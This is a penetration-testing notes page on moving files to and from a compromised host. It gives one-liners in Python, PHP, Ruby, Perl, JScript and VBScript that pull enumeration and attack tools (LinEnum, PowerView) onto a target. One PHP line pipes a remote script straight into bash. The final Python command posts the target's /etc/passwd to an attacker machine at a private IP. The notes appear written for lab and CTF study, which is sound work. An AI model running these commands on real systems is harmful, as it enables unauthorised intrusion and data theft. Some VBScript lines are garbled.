Flo Aberger | Cyber Notes Structured writeups for labs, CTFs, and security projects.

Transfer & Exfiltration

File Transfer using Common Coding Languages

Notes and commands for File Transfer using Common Coding Languages.

2024-03-27
Tags file-transferfile-transfer-using-common-coding-languages
Back to Pentest Notes Search Notes

Get a file onto the target(Download)

Python 2.7

  • python2.7 -c 'import urllib;urllib.urlretrieve ("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh", "LinEnum.sh")

Python 3

  • python3 -c 'import urllib.request;urllib.request.urlretrieve("https://raw.githubusercontent.com/rebootuser/ LinEnum/master/LinEnum.sh", "LinEnum.sh")'

PHP

  • php -r '$file = file_get_contents("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh"); file_put_contents("LinEnum.sh",$file);'

PHP alternative with fopen() and a buffer

  • php -r 'const BUFFER = 1024; $fremote = fopen("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh", "rb"); $flocal = fopen("LinEnum.sh", "wb"); while ($buffer = fread($fremote, BUFFER)) { fwrite($flocal, $buffer); } fclose($flocal); fclose($fremote);'

PHP and sent it directly to bash in a pipe and not save on machine

  • php -r '$lines = @file("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh"); foreach ($lines as $line_num => $line) { echo $line; }' | bash

Ruby

  • ruby -e 'require "net/http"; File.write("LinEnum.sh", Net::HTTP.get(URI.parse("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh")))'

Perl

  • perl -e 'use LWP::Simple; getstore("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh", "LinEnum.sh");'

javascript

  • create a file f.e: “wget.js” with the following code:

  • var WinHttpReq = new ActiveXObject(“WinHttp.WinHttpRequest.5.1”);

  • WinHttpReq.Open(“GET”, WScript.Arguments(0), /async=/false);

  • WinHttpReq.Send();

  • BinStream = new ActiveXObject(“ADODB.Stream”);

  • BinStream.Type = 1;

  • BinStream.Open();

  • BinStream.Write(WinHttpReq.ResponseBody);

  • BinStream.SaveToFile(WScript.Arguments(1));

Use PowerShell terminal oder Windows command prompt to execute

  • cscript.exe /nologo wget.js https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1 PowerView.ps1

VBScript(scripting language installed on most windows pcs since 98)

  • create a new file “wget.vbs”

  • dim xHttp: Set xHttp = createobject(“Microsoft.XMLHTTP”)

  • dim bStrm: Set bStrm = createobject(“Adodb.Stream”)

  • xHttp.Open “GET”, WScript.Arguments.Item(0), False

  • xHttp.Send

  • with bStrm

  • -.type = 1

.

open - -.write xHttp.responseBody

-.savetofile WScript.Arguments.Item(1), 2

  • end with

Execute file on PowerShell terminal

  • cscript.exe /nologo wget.vbs https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1 PowerView2.ps1

Uploading a file using a Pytthon oneliner - from target to os

  • start uploadserver on our kali:

  • python3 -m uploadserver

  • send the file to our kali:

  • python3 -c 'import requests;requests.post("http://192.168.49.128:8000/upload",files={"files":open("/etc/passwd","rb")})'